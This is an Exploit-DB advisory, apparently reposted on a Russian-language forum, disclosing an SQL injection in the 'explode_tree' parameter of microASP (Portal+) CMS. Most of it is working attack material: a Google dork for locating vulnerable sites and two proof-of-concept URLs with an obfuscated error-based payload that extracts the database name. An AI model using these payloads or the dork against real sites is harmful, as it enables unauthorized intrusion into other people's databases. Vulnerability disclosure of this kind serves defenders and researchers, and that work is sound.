- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 46799
- Проверка EDB
-
- Пройдено
- Автор
- FELIPE ANDRIAN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2019-05-06
microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection
Код:
[+] Sql Injection on microASP (Portal+) CMS
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.microasp.it/
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
[+] Exploit :
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
[+] PoC :
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF- Источник
- www.exploit-db.com
